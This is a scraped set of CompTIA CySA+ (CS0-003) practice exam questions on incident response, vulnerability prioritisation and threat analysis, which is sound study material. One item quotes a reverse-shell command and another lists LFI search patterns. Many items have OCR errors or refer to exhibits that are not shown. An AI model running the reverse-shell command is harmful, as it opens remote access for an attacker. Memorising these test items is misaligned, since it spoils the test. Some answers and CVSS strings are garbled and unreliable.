CS0-003 Exam
COMENTARIOS |
ESTADÍSTICAS |
RÉCORDS
|
Título del Test: CS0-003 Exam Descripción: CS0-003 Exam |
Nuevo Comentario| Comentarios |
|---|
NO HAY REGISTROS |
|
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H. Which of the following tools would work best to prevent the exposure of PII outside of an organization?. PAM. IDS. PKI. DLP. An organization conducted a web application vulnerability assessment against the corporate website,and the following output was observed: Which of the following tuning recommendations should the security analyst share?. Set an HttpOnlvflaq to force communication by HTTPS. Block requests without an X-Frame-Options header. Configure an Access-Control-Allow-Origin header to authorized domains. Disable the cross-origin resource sharing header. Which of the following items should be included in a vulnerability scan report? (Choose two.). Lessons learned. Service-level agreement. Playbook. Affected hosts. Risk score. Education plan. The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?. A mean time to remediate of 30 days. A mean time to detect of 45 days. A mean time to respond of 15 days. Third-party application testing. A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?. PowerShell. Ruby. Python. Shell Script. A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?. There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access. An on-path attack is being performed by someone with internal access that forces users into port 80. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80. An error was caused by BGP due to new rules applied over the company's internal routers. A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below: 1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities. 2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data. 3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system. According to the security policy, which of the following vulnerabilities should be the highest priority to patch?. A Thor Hammer. B Cap Shield. C Loki Dagger. D Thanos Guantlet. Which of the following will most likely ensure that mission-critical services are available in the event of an incident?. Business continuity plan. Vulnerability management plan. Disaster recovery plan. Asset management plan. The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise.Several high-risk cloud applications are used that increase the risk to the organization. Which of thefollowing solutions will assist in reducing the risk?. Deploy a CASB and enable policy enforcement. Configure MFA with strict access. Deploy an API gateway. Enable SSO to the cloud applications. An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?. CDN. Vulnerability scanner. DNS. Web server. A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?. Weaponization. Reconnaissance. Delivery. Exploitation. An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?. Exploitation. Reconnaissance. Command and control. Actions on objectives. An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.). Beaconinq. Domain Name System hijacking. Social engineering attack. On-path attack. Obfuscated links. Address Resolution Protocol poisoning. During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?. Conduct regular red team exercises over the application in production. Ensure that all implemented coding libraries are regularly checked. Use application security scanning as part of the pipeline for the CI/CDflow. Implement proper input validation for any data entry form. An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?. Proprietary systems. Legacy systems. Unsupported operating systems. Lack of maintenance windows. The security team reviews a web server for XSS and runs the following Nmap scan: Which of the following most accurately describes the result of the scan?. An output of characters > and " as the parameters used m the attempt. The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe. The vulnerable parameter and characters > and " with a reflected XSS attempt. Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?. Develop a call tree to inform impacted users. Schedule a review with all teams to discuss what occurred. Create an executive summary to update company leadership. Review regulatory compliance with public relations for official notification. A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?. Code analysis. Static analysis. Reverse engineering. Fuzzing. An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?. Hard disk. Primary boot partition. Malicious tiles. Routing table. Static IP address. Which of the following security operations tasks are ideal for automation?. A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules. Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number Call the user to help with any questions about using the application. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine. An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?. PCI Security Standards Council. Local law enforcement. Federal law enforcement. Card issuer. Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?. Mean time to detect. Number of exploits by tactic. Alert volume. Quantity of intrusion attempts. A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?. The current scanners should be migrated to the cloud. Cloud-specific misconfigurations may not be detected by the current scanners. Existing vulnerability scanners cannot scan laaS systems. Vulnerability scans on cloud environments should be performed from the cloud. A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?. Create a timeline of events detailinq the date stamps, user account hostname and IP information associated with the activities. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identity the case as an HR-related investigation. Notify the SOC manager for awareness after confirmation that the activity was intentional. Which of the following is the first step that should be performed when establishing a disaster recovery plan?. Agree on the goals and objectives of the plan. Determine the site to be used during a disaster. Demonstrate adherence to a standard disaster recovery process. Identity applications to be run during a disaster. A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?. Testing. Implementation. Validation. Rollback. The analyst reviews the following endpoint log entry: Which of the following has occurred?. Registry change. Rename computer. New account introduced. Privilege escalation. A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?. Data enrichment. Security control plane. Threat feed combination. Single pane of glass. Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output: Which of the following choices should the analyst look at first?. wh4dc-748gy.lan (192.168.86.152). lan (192.168.86.22). imaging.lan (192.168.86.150). xlaptop.lan (192.168.86.249). p4wnp1_aloa.lan (192.168.86.56). When starting an investigation, which of the following must be done first?. Notify law enforcement. Secure the scene. Seize all related evidence. Interview the witnesses. Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?. The lead should review what is documented in the incident response policy or plan. Management level members of the CSIRT should make that decision. The lead has the authority to decide who to communicate with at any t me. Subject matter experts on the team should communicate with others within the specified area of expertise. A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?. Firewall logs. Indicators of compromise. Risk assessment. Access control lists. An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?. Beaconing. Cross-site scripting. Buffer overflow. PHP traversal. A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?. Change the display filter to f cp. accive. pore. Change the display filter to tcg.port=20. Change the display filter to f cp-daca and follow the TCP streams. Navigate to the File menu and select FTP from the Export objects option. A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst.Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?. SLA. MOU. NDA. Limitation of liability. Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?. Command and control. Actions on objectives. Exploitation. Delivery. A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?. External. Agent-based. Non-credentialed. Credentialed. A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?. RCE. Reverse shell. XSS. SQL injection. An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?. Scope. Weaponization. CVSS. Asset value. An analyst is reviewing a vulnerability report for a server environment with the following entries: Which of the following systems should be prioritized for patching first?. 10.101.27.98. 54.73.225.17. 54.74.110.26. 54.74.110.228. A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?. Credentialed network scanning. Passive scanning. Agent-based scanning. Dynamic scanning. A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }. There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?. Implement step-up authentication for administrators. Improve employee training and awareness. Increase password complexity standards. Deploy mobile device management. Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?. Determine the sophistication of the audience that the report is meant for. Include references and sources of information on the first page. Include a table of contents outlining the entire report. Decide on the color scheme that will effectively communicate the metrics. A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers.Which of the following actions would allow the analyst to achieve the objective?. Upload the binary to an air gapped sandbox for analysis. Send the binaries to the antivirus vendor. Execute the binaries on an environment with internet connectivity. Query the file hashes using VirusTotal. Which of the following would help to minimize human engagement and aid in process improvement in security operations?. OSSTMM. SIEM. SOAR. QVVASP. After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?. Avoid. Transfer. Accept. Mitigate. Which of the following is an important aspect that should be included in the lessons-learned step after an incident?. Identify any improvements or changes in the incident response plan or procedures. Determine if an internal mistake was made and who did it so they do not repeat the error. Present all legal evidence collected and turn it over to iaw enforcement. Discuss the financial impact of the incident to determine if security controls are well spent. The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?. Single pane of glass. Single sign-on. Data enrichment. Deduplication. Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?. MITRE ATTACK. Cyber Kill Cham. OWASP. STIXTAXII. An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?. Eradication. Recovery. Containment. Preparation. Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?. Isolate Joe's PC from the network. Reimage the PC based on standard operating procedures. Initiate a remote wipe of Joe's PC using mobile device management. Perform no action until HR or legal counsel advises on next steps. The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?. Reduce the administrator and privileged access accounts. Employ a network-based IDS. Conduct thorough incident response. Enable SSO to enterprise applications. During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?. Clone the virtual server for forensic analysis. Log in to the affected server and begin analysis of the logs. Restore from the last known-good backup to confirm there was no loss of connectivity. Shut down the affected server immediately. A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?. C2 beaconing activity. Data exfiltration. Anomalous activity on unexpected ports. Network host IP address scanning. A rogue network device. New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?. Human resources must email a copy of a user agreement to all new employees. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement. All new employees must take a test about the company security policy during the cjitoardmg process. All new employees must sign a user agreement to acknowledge the company security policy. An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?. Information sharing organization. Blogs/forums. Cybersecuritv incident response team. Deep/dark web. An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned.Which of the following is the most likely reason to include lessons learned?. To satisfy regulatory requirements for incident reporting. To hold other departments accountable. To identify areas of improvement in the incident response process. To highlight the notable practices of the organization's incident response team. A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities: Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?. InLoud: Cobain: Yes Grohl: No Novo: Yes Smear: Yes Channing: No. TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No. ENameless: Cobain: Yes Grohl: No Novo: Yes Smear: No Channing: No. PBleach: Cobain: Yes Grohl: No Novo: No Smear: No Channing: Yes. A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?. Hacklivist. Advanced persistent threat. Insider threat. Script kiddie. An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?. Take a snapshot of the compromised server and verify its integrity. Restore the affected server to remove any malware. Contact the appropriate government agency to investigate. Research the malware strain to perform attribution. During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?. Disk contents. Backup data. Temporary files. Running processes. A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }. A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }. A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment: Which of the following should be completed first to remediate the findings?. Ask the web development team to update the page contents. Add the IP address allow listing for control panel access. Purchase an appropriate certificate from a trusted root CA. Perform proper sanitization on all fields. A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getconnection (database01, "alpha " , "AXTV. 127GdCx94GTd") ; Which of the following is the most likely vulnerability in this system?. Lack of input validation. SQL injection. Hard-coded credential. Buffer overflow attacks. A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?. Leave the proxy as is. Decomission the proxy. Migrate the proxy to the cloud. Patch the proxy. A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability: Which of the following log entries provides evidence of the attempted exploit?. Log entry 1. Log entry 2. Log entry 3. Log entry 4. Which of the following is the most important factor to ensure accurate incident response reporting?. A well-defined timeline of the events. A guideline for regulatory reporting. Logs from the impacted system. A well-developed executive summary. A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?. Geoblock the offending source country. Block the IP range of the scans at the network firewall. Perform a historical trend analysis and look for similar scanning activity. Block the specific IP address of the scans at the network firewall. An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?. Disable the user's network account and access to web resources. Make a copy of the files as a backup on the server. Place a legal hold on the device and the user's network share. Make a forensic image of the device and create a SRA-I hash. Patches for two highly exploited vulnerabilities were released on the same Friday afternoon.Information about the systems and vulnerabilities is shown in the tables below: Which of the following should the security analyst prioritize for remediation?. rogers. brady. brees. manning. A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: Which of the following vulnerability types is the security analyst validating?. Directory traversal. XSS. XXE. SSRF. During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?. Shut down the server. Reimage the server. Quarantine the server. Update the OS to latest version. A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?. Operating system version. Registry key values. Open ports. IP address. A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?. Credentialed scan. External scan. Differential scan. Network scan. A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?. Data exfiltration. Rogue device. Scanning. Beaconing. A technician is analyzing output from a popular network mapping tool for a PCI audit: Which of the following best describes the output?. The host is not up or responding. The host is running excessive cipher suites. The host is allowing insecure cipher suites. The Secure Shell port on this host is closed. A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output: Which of the following hosts should be patched first, based on the metrics?. host01. host02. host03. host04. A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?. config. ini. ntds.dit. Master boot record. Registry. A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability,and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?. Interview the users who access these systems. Scan the systems to see which vulnerabilities currently exist. Configure alerts for vendor-specific zero-day exploits. Determine the asset value of each system. A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?. CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H. CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H. CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H. VSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?. Transfer. Accept. Mitigate. Avoid. A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?. Wipe the computer and reinstall software. Shut down the email server and quarantine it from the network. Acquire a bit-level image of the affected workstation. Search for other mail users who have received the same file. An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?. Perform a tabletop drill based on previously identified incident scenarios. Simulate an incident by shutting down power to the primary data center. Migrate active workloads from the primary data center to the secondary location. Compare the current plan to lessons learned from previous incidents. An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-oflife date. Which of the following best describes a security analyst's concern?. Any discovered vulnerabilities will not be remediated. An outage of machinery would cost the organization money. Support will not be available for the critical machinery. There are no compensating controls in place for the OS. A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that crypto mining is occurring. Which of the following indicators would most likely lead the team to this conclusion?. High GPU utilization. Bandwidth consumption. Unauthorized changes. Unusual traffic spikes. A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below: Which of the following has most likely occurred?. An Office document with a malicious macro was opened. A credential-stealing website was visited. A phishing link in an email was clicked. A web browser vulnerability was exploited. During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's personal email. Which of the following should the analyst recommend be done first?. Place a legal hold on the employee's mailbox. Enable filtering on the web proxy. Disable the public email access with CASB. Configure a deny rule on the firewall. Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?. SLA. LOI. MOU. KPI. Which of the following describes the best reason for conducting a root cause analysis?. The root cause analysis ensures that proper timelines were documented. The root cause analysis allows the incident to be properly documented for reporting. The root cause analysis develops recommendations to improve the process. The root cause analysis identifies the contributing items that facilitated the event. An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?. SOAR. SIEM. SLA. IoC. An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?. Passive network foot printing. OS fingerprinting. Service port identification. Application versioning. Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?. Command and control. Data enrichment. Automation. Single sign-on. After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?. SIEM ingestion logs are reduced by 20%. Phishing alerts drop by 20%. False positive rates drop to 20%. The MTTR decreases by 20%. An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: • created the initial evidence log. • disabled the wireless adapter on the device. • interviewed the employee, who was unable to identify the website that was accessed • reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?. Update the system firmware and reimage the hardware. Install an additional malware scanner that will send email alerts to the analyst. Configure the system to use a proxy server for Internet access. Delete the user profile and restore data from backup. A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this requirement?. SIEM. CASB. SOAR. EDR. A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: • DNS traffic while a tunneling session is active. • The mean time between queries is less than one second. • The average query length exceeds 100 characters. Which of the following attacks most likely occurred?. DNS exfiltration. DNS spoofing. DNS zone transfer. DNS poisoning. A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?. SIEM. XDR. SOAR. EDR. A company is in the process of implementing a vulnerability management program. no-lich of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?. Non-credentialed scanning. Passive scanning. Agent-based scanning. Credentialed scanning. A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?. Generate a hash value and make a backup image. Encrypt the device to ensure confidentiality of the data. Protect the device with a complex password. Perform a memory scan dump to collect residual data. A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?. The server was configured to use SSI- to securely transmit data. The server was supporting weak TLS protocols for client connections. The malware infected all the web servers in the pool. The digital certificate on the web server was self-signed. A security analyst is reviewing the following alert that was triggered by FIM on a critical system: Which of the following best describes the suspicious activity that is occurring?. A fake antivirus program was installed by the user. A network drive was added to allow exfiltration of data. A new program has been set to execute on system start. The host firewall on 192.168.1.10 was disabled. A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?. grep [IP address] packets.pcap. cat packets.pcap | grep [IP Address]. tcpdump -n -r packets.pcap host [IP address]. strings packets.pcap | grep [IP Address]. Given the following CVSS string-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H Which of the following attributes correctly describes this vulnerability?. A user is required to exploit this vulnerability. The vulnerability is network based. The vulnerability does not affect confidentiality. The complexity to exploit the vulnerability is high. An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two). Drop the tables on the database server to prevent data exfiltration. Deploy EDR on the web server and the database server to reduce the adversaries capabilities. Stop the httpd service on the web server so that the adversary can not use web exploits. use micro segmentation to restrict connectivity to/from the web and database servers. Comment out the HTTP account in the / etc/passwd file of the web server. Move the database from the database server to the web server. A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?. Increasing training and awareness for all staff. Ensuring that malicious websites cannot be visited. Blocking all scripts downloaded from the internet. Disabling all staff members' ability to run downloaded applications. Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?. MOU. NDA. BIA. SLA. Which of the following risk management principles is accomplished by purchasing cyber insurance?. Accept. Avoid. Mitigate. Transfer. The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company: Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?. Vulnerability A. Vulnerability B. Vulnerability C. Vulnerability D. While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?. Shut the network down immediately and call the next person in the chain of command. Determine what attack the odd characters are indicative of. Utilize the correct attack framework and determine what the incident response will consist of. Notify the local law enforcement for incident response. A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?. /etc/ shadow. curl localhost. ; printenv. cat /proc/self/. A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://offce365password.acme.co. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?. This is a normal password change URL. The security operations center is performing a routine password audit. A new VPN gateway has been deployed. A social engineering attack is underway. The security analyst received the monthly vulnerability report. The following findings were included in the report • Five of the systems only required a reboot to finalize the patch application. • Two of the servers are running outdated operating systems and cannot be patched The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?. Compensating controls. Due diligence. Maintenance windows. Passive discovery. Which of the following best describes the goal of a tabletop exercise?. To test possible incident scenarios and how to react properly. To perform attack exercises to check response effectiveness. To understand existing threat actors and how to replicate their techniques. To check the effectiveness of the business continuity plan. During the log analysis phase, the following suspicious command is detected- Which of the following is being attempted?. Buffer overflow. RCE. ICMP tunneling. Smurf attack. A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network.Which of the following metrics should the team lead include in the briefs?. Mean time between failures. Mean time to detect. Mean time to remediate. Mean time to contain. An analyst is examining events in multiple systems but is having difficulty correlating data points.Which of the following is most likely the issue with the system?. Access rights. Network segmentation. Time synchronization. Invalid playbook. Approximately 100 employees at your company have received a Phishing email. AS a security analyst. you have been tasked with handling this Situation. 1. How many employees clicked on the link in the phishing email? 2. On how many workstations was the malware installed? 3. What is the executable file name of the malware?. According to the email server logs, 25 employees clicked on the link in the phishing email. According to the file server logs, the malware was installed on 15 workstations. The executable file name of the malware is svchost.EXE. SIMULATION You are a cybersecurity analyst tasked with interpreting scan data from Company As servers You must verify the requirements are being met for all of the servers and recommend changes if you find they are not The company's hardening guidelines indicate the following • TLS 1 2 is the only version of TLS running. • Apache 2.4.18 or greater should be used. • Only default ports should be used. AppServ1: No changes are needed for this server. AppServ2: Disable or upgrade TLS 1.0 and TLS 1.1 to TLS 1.2 on this server to ensure secure encryption and communication between clients and the server. Update Apache from version 2.4.17 to version 2.4.18 or greater on this server to fix any potential 